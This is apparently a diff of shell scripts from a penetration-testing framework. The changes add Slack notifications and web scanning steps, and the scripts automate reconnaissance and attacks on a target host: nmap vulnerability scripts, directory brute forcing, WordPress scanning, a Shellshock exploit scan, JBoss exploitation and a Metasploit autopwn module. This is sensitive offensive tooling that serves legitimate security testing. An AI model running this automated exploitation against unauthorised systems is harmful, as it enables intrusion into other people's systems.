sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
fi
|
||||
|
|
@ -55,6 +62,9 @@ if [ "$MODE" = "fullportonly" ]; then
|
|||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -4,9 +4,11 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL PORT SCAN $RESET"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
#nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running full port scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
|
|
@ -15,7 +17,10 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -23,8 +23,12 @@ if [ "$REPORT" = "1" ]; then
|
|||
args="$args -w $WORKSPACE"
|
||||
fi
|
||||
args="$args --noreport"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-normal.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
||||
|
|
@ -50,7 +54,7 @@ echo -e "$OKRED GATHERING DNS INFO $RESET"
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
dnsenum $TARGET 2> /dev/null
|
||||
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
|
||||
|
||||
|
|
@ -73,6 +77,8 @@ echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$MODE" == "web" ]; then
|
||||
nmap -sV -T5 -Pn -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
elif [ "$MODE" == "webscan" ]; then
|
||||
nmap -sV -T5 -Pn -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
elif [ ! -z "$PORT" ]; then
|
||||
nmap -sS -T5 -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
else
|
||||
|
|
@ -384,6 +390,7 @@ else
|
|||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L http://$TARGET | tee $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
|
|
@ -402,17 +409,20 @@ else
|
|||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80
|
||||
fi
|
||||
source $INSTALL_DIR/modes/normal_webporthttp.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
fi
|
||||
|
|
@ -550,7 +560,7 @@ else
|
|||
fi
|
||||
fi
|
||||
|
||||
if [ -z "$port_161" ];
|
||||
if [ -z "$port_161U" ];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET"
|
||||
else
|
||||
|
|
@ -640,6 +650,7 @@ else
|
|||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L https://$TARGET | tee $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
|
|
@ -677,6 +688,11 @@ else
|
|||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
|
||||
|
||||
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443
|
||||
fi
|
||||
source $INSTALL_DIR/modes/normal_webporthttps.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
fi
|
||||
|
|
@ -1186,6 +1202,9 @@ echo -e "${OKGREEN}=============================================================
|
|||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
if [ "$LOOT" = "1" ] && [ -z "$NOLOOT" ]; then
|
||||
loot
|
||||
fi
|
||||
|
|
@ -1,115 +1,133 @@
|
|||
if [ "$MODE" = "web" ]; then
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET"
|
||||
fi
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
|
||||
echo ""
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running web mode scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-common.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-full.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
fi
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
|
||||
fi
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
|
||||
echo ""
|
||||
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-exploits.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
|
||||
fi
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
|
||||
PORT="80"
|
||||
SSL="false"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
nmap -A -Pn -T5 -p 80 -sV --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
|
||||
fi
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
|
||||
echo ""
|
||||
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
|
||||
fi
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
|
||||
PORT="80"
|
||||
SSL="false"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
fi
|
||||
|
|
@ -1,114 +1,132 @@
|
|||
if [ "$MODE" = "web" ]; then
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
